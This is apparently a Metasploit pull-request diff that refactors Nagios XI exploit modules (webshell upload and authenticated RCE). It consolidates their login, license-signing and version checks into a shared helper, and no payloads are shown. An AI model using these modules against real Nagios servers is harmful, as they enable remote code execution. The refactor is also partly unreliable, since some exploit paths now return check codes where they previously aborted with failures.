### PR TITLE
optimising the nagiosxi modules and also fixing the bug when autochec…

### DIFF
--- a/lib/msf/core/exploit/remote/http/nagios_xi/login.rb
+++ b/lib/msf/core/exploit/remote/http/nagios_xi/login.rb
@@ -2,6 +2,105 @@
 
 module Msf::Exploit::Remote::HTTP::NagiosXi::Login
   include Msf::Exploit::Remote::HTTP::NagiosXi::URIs
+
+  AUTH_RESULTS = {
+    :connection_failed => 1,
+    :unexpected_error => 2,
+    :not_nagios_application => 3,
+    :not_fully_installed => 4,
+    :failed_to_handle_license_agreement => 5,
+    :failed_to_extract_tokens => 6,
+    :unable_to_obtain_version => 7
+  }
+
+  # Returns a status code an a error message on failure.
+  # On success returns the status code and an array so we
+  # can update the login_result and res_array variables appropriately.
+  def handle_unsigned_license(res_array, username, password, finish_install)
+    auth_cookies, nsp = res_array
+    sign_license_result = sign_license_agreement(auth_cookies, nsp)
+    if sign_license_result
+      return 5, 'Failed to sign license agreement'
+    end
+
+    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
+    sleep 5
+    login_result, res_array = login_after_install_or_license(username, password, finish_install)
+    case login_result
+    when 1..4 # An error occurred, propagate the error message
+      return login_result, res_array[0]
+    when 5 # The Nagios XI license agreement still has not been signed
+      return 5, 'Failed to sign the license agreement.'
+    end
+
+    return login_result, res_array
+  end
+
+  # Returns a status code an a error message on failure.
+  # On success returns the status code and an array so we
+  # can update the login_result and res_array variables appropriately.
+  def install_full_nagios(username, password, finish_install)
+    install_result = install_nagios_xi(password)
+    if install_result
+      return install_result[0], install_result[1]
+    end
+
+    login_result, res_array = login_after_install_or_license(username, password, finish_install)
+    case login_result
+    when 1..4 # An error occurred, propagate the error message
+      return login_result, res_array[0]
+    when 5 # The license agreement still needs to be signed
+      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+      return login_result, res_array
+    end
+
+    return login_result, res_array
+  end
+
+  def authenticate(username, password, finish_install, handle_full_install = true, handle_license = true, handle_nsp = false)
+    login_result, res_array = nagios_xi_login(username, password, finish_install)
+    case login_result
+    when 1..3
+      return login_result, res_array[0]
+    when 4 # Nagios XI is not fully installed
+      return login_result, 'Nagios is not fully installed.' unless handle_full_install
+      login_result, res_array = install_full_nagios(username, password, finish_install)
+      return login_result, res_array unless (login_result == 0)
+    when 5
+      return login_result, 'The Nagios license has not been signed.' unless handle_license
+      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+      return login_result, res_array unless (login_result == 0)
+    end
+
+    print_good('Successfully authenticated to Nagios XI.')
+
+    return 6, "Failed to extract auth cookies and nsp string" unless res_array.length == 2
+
+    auth_cookies = extract_auth_cookies(res_array) # if we are here, this cannot be nil since the mixin checks for that already
+    return 6, 'Failed to extract authentication cookies' unless auth_cookies.present?
+
+    nsp = get_nsp(res_array[0]) if handle_nsp
+    return 6, 'Failed to extract nsp string' if handle_nsp && !nsp.present?
+
+    # Obtain the Nagios XI version
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return 7, 'Unable to obtain the Nagios XI version from the dashboard'
+    end
+
+    print_status("Target is Nagios XI with version #{nagios_version}.")
+
+    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
+    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
+
+    if /#{Msf::Exploit::Remote::HTTP::NagiosXi::PRE_5_2_VERSION_REGEX}/.match(nagios_version) || nagios_version == '5r1.0'
+      nagios_version = '1.0.0'
+    end
+    version = Rex::Version.new(nagios_version)
+
+    return 0, 'Successfully authenticated and retrieved NagiosXI Version.', auth_cookies, version, nsp
+  end
+
   # performs a Nagios XI login
   #
   # @param user [String] Username
@@ -159,12 +258,22 @@ module Msf::Exploit::Remote::HTTP::NagiosXi::Login
 
   end
 
+  # Grabs the auth_cookies value from an HTTP response and validate using regex
+  #
+  # @param res [Rex::Proto::Http::Response] HTTP response
+  # @return [String, nil] auth_cookies value, nil if not found
+  def extract_auth_cookies(res_array)
+    auth_cookies = res_array[1]
+    return auth_cookies if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)
+  end
+
   # Grabs the nsp_str value from an HTTP response using regex
   #
   # @param res [Rex::Proto::Http::Response] HTTP response
   # @return [String, nil] nsp_str value, nil if not found
   def get_nsp(res)
-    nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/)&.flatten&.first
+    res = res.body if res.kind_of?(Rex::Proto::Http::Response)
+    nsp = res.scan(/nsp_str = "([a-z0-9]+)/)&.flatten&.first
   end
 
   # Performs an authentication attempt. If the server does not return a response,

--- a/lib/msf/core/exploit/remote/http/nagios_xi/version.rb
+++ b/lib/msf/core/exploit/remote/http/nagios_xi/version.rb
@@ -3,6 +3,10 @@
 module Msf::Exploit::Remote::HTTP::NagiosXi::Version
   include Msf::Exploit::Remote::HTTP::NagiosXi::URIs
 
+  # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
+  # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
+  PRE_5_2_VERSION_REGEX = '^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$'
+
   # Extracts the Nagios XI version information from an HTTP response body obtained after authentication.
   # Works for index.php and perhaps other backend pages.
   #

--- a/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
+++ b/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
@@ -95,43 +95,15 @@ class MetasploitModule < Msf::Exploit::Remote
     @webshell_path = '/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/'
   end
 
-  def authenticate
-    login_result, res_array = nagios_xi_login(datastore['USERNAME'], datastore['PASSWORD'], false)
-    case login_result
-    when 1..3 # An error occurred
-      return login_result, res_array[0]
-    when 4
-      return login_result, 'Nagios is not fully installed.'
-    when 5
-      return login_result, 'The Nagios license has not been signed.'
-    end
-
-    # res_array[1] cannot be nil since the mixin checks for that already.
-    @auth_cookies = res_array[1]
-
-    nagios_version = nagios_xi_version(res_array[0])
-    if nagios_version.nil?
-      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
-    end
-
-    # As affected versions are only 5.2.0 -> 5.8.4
-    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
-      nagios_version = '1.0.0'
-    end
-    @version = Rex::Version.new(nagios_version)
-
-    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
-  end
-
   # Authenticate and grab the version from the dashboard. Store auth cookies for later user.
   def check
-    auth_result, err_msg = authenticate
+    auth_result, err_msg, @auth_cookies, @version = authenticate(datastore['USERNAME'], datastore['PASSWORD'], false, false, false)
     case auth_result
-    when 1 # An error occurred
+    when AUTH_RESULTS[:connection_failed]
       return CheckCode::Unknown(err_msg)
-    when 2, 4, 5, 6
+    when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
       return CheckCode::Detected(err_msg)
-    when 3
+    when AUTH_RESULTS[:not_nagios_application]
       return CheckCode::Safe(err_msg)
     end
 
@@ -242,16 +214,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     # create a randomish web shell name if the user doesn't specify one
     @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"
-
     unless @auth_cookies.present?
-      login_result, err_msg = authenticate
-      case login_result
-      when 1
-        fail_with(Failure::Disconnected, err_msg)
-      when 2, 4, 5, 6
-        fail_with(Failure::UnexpectedReply, err_msg)
-      when 3
-        fail_with(Failure::NotVulnerable, err_msg)
+      auth_result, err_msg, @auth_cookies, @version = authenticate(datastore['USERNAME'], datastore['PASSWORD'], false, false, false)
+      case auth_result
+      when AUTH_RESULTS[:connection_failed]
+        return CheckCode::Unknown(err_msg)
+      when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
+        return CheckCode::Detected(err_msg)
+      when AUTH_RESULTS[:not_nagios_application]
+        return CheckCode::Safe(err_msg)
       end
     end
 

--- a/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
+++ b/modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
@@ -95,16 +95,15 @@ class MetasploitModule < Msf::Exploit::Remote
     @webshell_path = '/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/'
   end
 
-  # Authenticate and grab the version from the dashboard. Store auth cookies for later user.
-  def check
+  def authenticate
     login_result, res_array = nagios_xi_login(datastore['USERNAME'], datastore['PASSWORD'], false)
     case login_result
     when 1..3 # An error occurred
-      return CheckCode::Unknown(res_array[0])
+      return login_result, res_array[0]
     when 4
-      return CheckCode::Detected('Nagios is not fully installed.')
+      return login_result, 'Nagios is not fully installed.'
     when 5
-      return CheckCode::Detected('The Nagios license has not been signed.')
+      return login_result, 'The Nagios license has not been signed.'
     end
 
     # res_array[1] cannot be nil since the mixin checks for that already.
@@ -112,16 +111,37 @@ class MetasploitModule < Msf::Exploit::Remote
 
     nagios_version = nagios_xi_version(res_array[0])
     if nagios_version.nil?
-      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
+    end
+
+    # As affected versions are only 5.2.0 -> 5.8.4
+    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
+      nagios_version = '1.0.0'
+    end
+    @version = Rex::Version.new(nagios_version)
+
+    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
+  end
+
+  # Authenticate and grab the version from the dashboard. Store auth cookies for later user.
+  def check
+    auth_result, err_msg = authenticate
+    case auth_result
+    when 1 # An error occurred
+      return CheckCode::Unknown(err_msg)
+    when 2, 4, 5, 6
+      return CheckCode::Detected(err_msg)
+    when 3
+      return CheckCode::Safe(err_msg)
     end
 
     # affected versions are 5.2.0 -> 5.8.4
-    if Rex::Version.new(nagios_version) < Rex::Version.new('5.8.5') &&
-       Rex::Version.new(nagios_version) >= Rex::Version.new('5.2.0')
-      return CheckCode::Appears("Determined using the self-reported version: #{nagios_version}")
+    if @version < Rex::Version.new('5.8.5') &&
+       @version >= Rex::Version.new('5.2.0')
+      return CheckCode::Appears("Determined using the self-reported version: #{@version.version}")
     end
 
-    CheckCode::Safe("Determined using the self-reported version: #{nagios_version}")
+    CheckCode::Safe("Determined using the self-reported version: #{@version.version}")
   end
 
   # Using the path traversal, upload a php webshell to the remote target
@@ -222,6 +242,18 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     # create a randomish web shell name if the user doesn't specify one
     @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"
+
+    unless @auth_cookies.present?
+      login_result, err_msg = authenticate
+      case login_result
+      when 1
+        fail_with(Failure::Disconnected, err_msg)
+      when 2, 4, 5, 6
+        fail_with(Failure::UnexpectedReply, err_msg)
+      when 3
+        fail_with(Failure::NotVulnerable, err_msg)
+      end
+    end
 
     drop_webshell
 

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -89,100 +89,15 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
-  # Returns a status code an a error message on failure.
-  # On success returns the status code and an array so we
-  # can update the login_result and res_array variables appropriately.
-  def handle_unsigned_license(res_array, username, password, finish_install)
-    auth_cookies, nsp = res_array
-    sign_license_result = sign_license_agreement(auth_cookies, nsp)
-    if sign_license_result
-      return 5, 'Failed to sign license agreement'
-    end
-
-    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
-    sleep 5
-    login_result, res_array = login_after_install_or_license(username, password, finish_install)
-    case login_result
-    when 1..4 # An error occurred, propagate the error message
-      return login_result, res_array[0]
-    when 5 # The Nagios XI license agreement still has not been signed
-      return 5, 'Failed to sign the license agreement.'
-    end
-
-    return login_result, res_array
-  end
-
-  def authenticate
-    # Use nagios_xi_login to try and authenticate.
-    login_result, res_array = nagios_xi_login(username, password, finish_install)
-    case login_result
-    when 1..3 # An error occurred, propagate the error message
-      return login_result, res_array[0]
-    when 4 # Nagios XI is not fully installed
-      install_result = install_nagios_xi(password)
-      if install_result # On installation failure, result is an array with the code and error message
-        return install_result[0], install_result[1]
-      end
-
-      login_result, res_array = login_after_install_or_license(username, password, finish_install)
-      case login_result
-      when 1..4 # An error occurred, propagate the error message
-        return login_result, res_array[0]
-      when 5 # The license agreement still needs to be signed
-        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
-        return login_result, res_array unless (login_result == 0)
-      end
-    when 5 # The license agreement still needs to be signed
-      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
-      return login_result, res_array unless (login_result == 0)
-    end
-
-    print_good('Successfully authenticated to Nagios XI.')
-    # Extract the authenticated cookies and nsp to use throughout the module
-    if res_array.length == 2
-      auth_cookies = res_array[1]
-      if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)
-        @auth_cookies = auth_cookies
-      else
-        return login_result, 'Failed to extract authentication cookies'
-      end
-      nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/)
-      if nsp
-        @nsp = nsp[1]
-      else
-        return login_result, 'Failed to extract nsp string'
-      end
-    else
-      return login_result, 'Failed to extract auth cookies and nsp string'
-    end
-
-    # Set the version here so both check and exploit can use it
-    nagios_version = nagios_xi_version(res_array[0])
-    if nagios_version.nil?
-      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
-    end
-
-    print_status("Target is Nagios XI with version #{nagios_version}.")
-
-    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
-    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
-    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
-      nagios_version = '1.0.0'
-    end
-    @version = Rex::Version.new(nagios_version)
-
-    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
-  end
-
   def check
     # Authenticate to ensure we can access the NagiosXI version
-    auth_result, err_msg = authenticate
+    auth_result, err_msg, @auth_cookies, @version, @nsp = authenticate(username, password, finish_install, true, true, true)
     case auth_result
-    when 1
+    when AUTH_RESULTS[:connection_failed]
       return CheckCode::Unknown(err_msg)
-    when 2, 4, 5, 6
+    when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
       return CheckCode::Detected(err_msg)
-    when 3
+    when AUTH_RESULTS[:not_nagios_application]
       return CheckCode::Safe(err_msg)
     end
 
@@ -195,14 +110,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
-      auth_result, err_msg = authenticate
+      auth_result, err_msg, @auth_cookies, @version, @nsp = authenticate(username, password, finish_install, true, true, true)
       case auth_result
-      when 1
-        fail_with(Failure::Disconnected, err_msg)
-      when 2, 4, 5, 6
-        fail_with(Failure::UnexpectedReply, err_msg)
-      when 3
-        fail_with(Failure::NotVulnerable, err_msg)
+      when AUTH_RESULTS[:connection_failed]
+        return CheckCode::Unknown(err_msg)
+      when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
+        return CheckCode::Detected(err_msg)
+      when AUTH_RESULTS[:not_nagios_application]
+        return CheckCode::Safe(err_msg)
       end
     end
 

--- a/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
@@ -84,65 +84,86 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
-  def check
-    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
-    # an array containing the http response body of a get request to index.php and the session cookies
+  def handle_unsigned_license(res_array, username, password, finish_install)
+    auth_cookies, nsp = res_array
+    sign_license_result = sign_license_agreement(auth_cookies, nsp)
+    if sign_license_result
+      return 5, 'Failed to sign license agreement'
+    end
+
+    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
+    sleep 5
+    login_result, res_array = login_after_install_or_license(username, password, finish_install)
+    case login_result
+    when 1..4 # An error occurred, propagate the error message
+      return login_result, res_array[0]
+    when 5 # The Nagios XI license agreement still has not been signed
+      return 5, 'Failed to sign the license agreement.'
+    end
+
+    return login_result, res_array
+  end
+
+  def authenticate
     login_result, res_array = nagios_xi_login(username, password, finish_install)
     case login_result
-    when 1..3 # An error occurred
-      return CheckCode::Unknown(res_array[0])
+    when 1..3
+      return login_result, res_array[0]
     when 4 # Nagios XI is not fully installed
       install_result = install_nagios_xi(password)
       if install_result
-        return CheckCode::Unknown(install_result[1])
+        return install_result[0], install_result[1]
       end
 
       login_result, res_array = login_after_install_or_license(username, password, finish_install)
       case login_result
-      when 1..3 # An error occurred
-        return CheckCode::Unknown(res_array[0])
-      when 4 # Nagios XI is still not fully installed
-        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+      when 1..4 # An error occurred, propagate the error message
+        return login_result, res_array[0]
+      when 5 # The license agreement still needs to be signed
+        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+        return login_result, res_array unless (login_result == 0)
       end
+    when 5
+      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+      return login_result, res_array unless (login_result == 0)
     end
 
-    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
-    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
-    if login_result == 5 # the Nagios XI license agreement has not been signed
-      auth_cookies, nsp = res_array
-      sign_license_result = sign_license_agreement(auth_cookies, nsp)
-      if sign_license_result
-        return CheckCode::Unknown(sign_license_result[1])
-      end
-
-      login_result, res_array = login_after_install_or_license(username, password, finish_install)
-      case login_result
-      when 1..3
-        return CheckCode::Unknown(res_array[0])
-      when 5 # the Nagios XI license agreement still has not been signed
-        return CheckCode::Detected('Failed to sign the license agreement.')
-      end
-    end
-
-    print_good('Successfully authenticated to Nagios XI')
+    print_good('Successfully authenticated to Nagios XI.')
 
     # Obtain the Nagios XI version
     @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
 
     nagios_version = nagios_xi_version(res_array[0])
     if nagios_version.nil?
-      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
     end
 
-    print_status("Target is Nagios XI with version #{nagios_version}")
+    print_status("Target is Nagios XI with version #{nagios_version}.")
 
-    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
-      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
+    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
+    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
+    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
+      nagios_version = '1.0.0'
+    end
+    @version = Rex::Version.new(nagios_version)
+
+    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
+  end
+
+  def check
+    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
+    # an array containing the http response body of a get request to index.php and the session cookies
+    auth_result, err_msg = authenticate
+    case auth_result
+    when 1
+      return CheckCode::Unknown(err_msg)
+    when 2, 4, 5, 6
+      return CheckCode::Detected(err_msg)
+    when 3
+      return CheckCode::Safe(err_msg)
     end
 
-    # check if the target is actually vulnerable
-    version = Rex::Version.new(nagios_version)
-    if version >= Rex::Version.new('5.6.0') && version <= Rex::Version.new('5.7.3')
+    if @version >= Rex::Version.new('5.6.0') && @version <= Rex::Version.new('5.7.3')
       return CheckCode::Appears
     end
 
@@ -151,6 +172,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     # execute payload
+    unless @auth_cookies.present?
+      login_result, err_msg = authenticate
+      case login_result
+      when 1
+        fail_with(Failure::Disconnected, err_msg)
+      when 2, 4, 5, 6
+        fail_with(Failure::UnexpectedReply, err_msg)
+      when 3
+        fail_with(Failure::NotVulnerable, err_msg)
+      end
+    end
+
     send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'admin', 'mibs.php'),

--- a/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
@@ -84,82 +84,16 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
-  def handle_unsigned_license(res_array, username, password, finish_install)
-    auth_cookies, nsp = res_array
-    sign_license_result = sign_license_agreement(auth_cookies, nsp)
-    if sign_license_result
-      return 5, 'Failed to sign license agreement'
-    end
-
-    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
-    sleep 5
-    login_result, res_array = login_after_install_or_license(username, password, finish_install)
-    case login_result
-    when 1..4 # An error occurred, propagate the error message
-      return login_result, res_array[0]
-    when 5 # The Nagios XI license agreement still has not been signed
-      return 5, 'Failed to sign the license agreement.'
-    end
-
-    return login_result, res_array
-  end
-
-  def authenticate
-    login_result, res_array = nagios_xi_login(username, password, finish_install)
-    case login_result
-    when 1..3
-      return login_result, res_array[0]
-    when 4 # Nagios XI is not fully installed
-      install_result = install_nagios_xi(password)
-      if install_result
-        return install_result[0], install_result[1]
-      end
-
-      login_result, res_array = login_after_install_or_license(username, password, finish_install)
-      case login_result
-      when 1..4 # An error occurred, propagate the error message
-        return login_result, res_array[0]
-      when 5 # The license agreement still needs to be signed
-        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
-        return login_result, res_array unless (login_result == 0)
-      end
-    when 5
-      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
-      return login_result, res_array unless (login_result == 0)
-    end
-
-    print_good('Successfully authenticated to Nagios XI.')
-
-    # Obtain the Nagios XI version
-    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
-
-    nagios_version = nagios_xi_version(res_array[0])
-    if nagios_version.nil?
-      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
-    end
-
-    print_status("Target is Nagios XI with version #{nagios_version}.")
-
-    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
-    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
-    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
-      nagios_version = '1.0.0'
-    end
-    @version = Rex::Version.new(nagios_version)
-
-    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
-  end
-
   def check
     # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
     # an array containing the http response body of a get request to index.php and the session cookies
-    auth_result, err_msg = authenticate
+    auth_result, err_msg, @auth_cookies, @version = authenticate(username, password, finish_install)
     case auth_result
-    when 1
+    when AUTH_RESULTS[:connection_failed]
       return CheckCode::Unknown(err_msg)
-    when 2, 4, 5, 6
+    when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
       return CheckCode::Detected(err_msg)
-    when 3
+    when AUTH_RESULTS[:not_nagios_application]
       return CheckCode::Safe(err_msg)
     end
 
@@ -173,14 +107,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     # execute payload
     unless @auth_cookies.present?
-      login_result, err_msg = authenticate
-      case login_result
-      when 1
-        fail_with(Failure::Disconnected, err_msg)
-      when 2, 4, 5, 6
-        fail_with(Failure::UnexpectedReply, err_msg)
-      when 3
-        fail_with(Failure::NotVulnerable, err_msg)
+      auth_result, err_msg, @auth_cookies, @version = authenticate(username, password, finish_install)
+      case auth_result
+      when AUTH_RESULTS[:connection_failed]
+        return CheckCode::Unknown(err_msg)
+      when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]
+        return CheckCode::Detected(err_msg)
+      when AUTH_RESULTS[:not_nagios_application]
+        return CheckCode::Safe(err_msg)
       end
     end
 

--- a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
@@ -89,7 +89,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 1,
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ]
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
+          'Reliability' => [] # fixing rubocop issues
         }
       )
     )
@@ -111,64 +112,86 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
-  def check
-    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
-    # an array containing the http response body of a get request to index.php and the session cookies
+  def handle_unsigned_license(res_array, username, password, finish_install)
+    auth_cookies, nsp = res_array
+    sign_license_result = sign_license_agreement(auth_cookies, nsp)
+    if sign_license_result
+      return 5, 'Failed to sign license agreement'
+    end
+
+    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
+    sleep 5
+    login_result, res_array = login_after_install_or_license(username, password, finish_install)
+    case login_result
+    when 1..4 # An error occurred, propagate the error message
+      return login_result, res_array[0]
+    when 5 # The Nagios XI license agreement still has not been signed
+      return 5, 'Failed to sign the license agreement.'
+    end
+
+    return login_result, res_array
+  end
+
+  def authenticate
     login_result, res_array = nagios_xi_login(username, password, finish_install)
     case login_result
-    when 1..3 # An error occurred
-      return CheckCode::Unknown(res_array[0])
+    when 1..3
+      return login_result, res_array[0]
     when 4 # Nagios XI is not fully installed
       install_result = install_nagios_xi(password)
       if install_result
-        return CheckCode::Unknown(install_result[1])
+        return install_result[0], install_result[1]
       end
 
       login_result, res_array = login_after_install_or_license(username, password, finish_install)
       case login_result
-      when 1..3 # An error occurred
-        return CheckCode::Unknown(res_array[0])
-      when 4 # Nagios XI is still not fully installed
-        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+      when 1..4 # An error occurred, propagate the error message
+        return login_result, res_array[0]
+      when 5 # The license agreement still needs to be signed
+        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+        return login_result, res_array unless (login_result == 0)
       end
+    when 5
+      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+      return login_result, res_array unless (login_result == 0)
     end
 
-    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
-    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
-    if login_result == 5 # the Nagios XI license agreement has not been signed
-      auth_cookies, nsp = res_array
-      sign_license_result = sign_license_agreement(auth_cookies, nsp)
-      if sign_license_result
-        return CheckCode::Unknown(sign_license_result[1])
-      end
-
-      login_result, res_array = login_after_install_or_license(username, password, finish_install)
-      case login_result
-      when 1..3
-        return CheckCode::Unknown(res_array[0])
-      when 5 # the Nagios XI license agreement still has not been signed
-        return CheckCode::Detected('Failed to sign the license agreement.')
-      end
-    end
-
-    print_good('Successfully authenticated to Nagios XI')
+    print_good('Successfully authenticated to Nagios XI.')
 
     # Obtain the Nagios XI version
     @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
 
     nagios_version = nagios_xi_version(res_array[0])
     if nagios_version.nil?
-      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
     end
 
-    print_status("Target is Nagios XI with version #{nagios_version}")
+    print_status("Target is Nagios XI with version #{nagios_version}.")
 
-    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
-      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
+    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
+    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
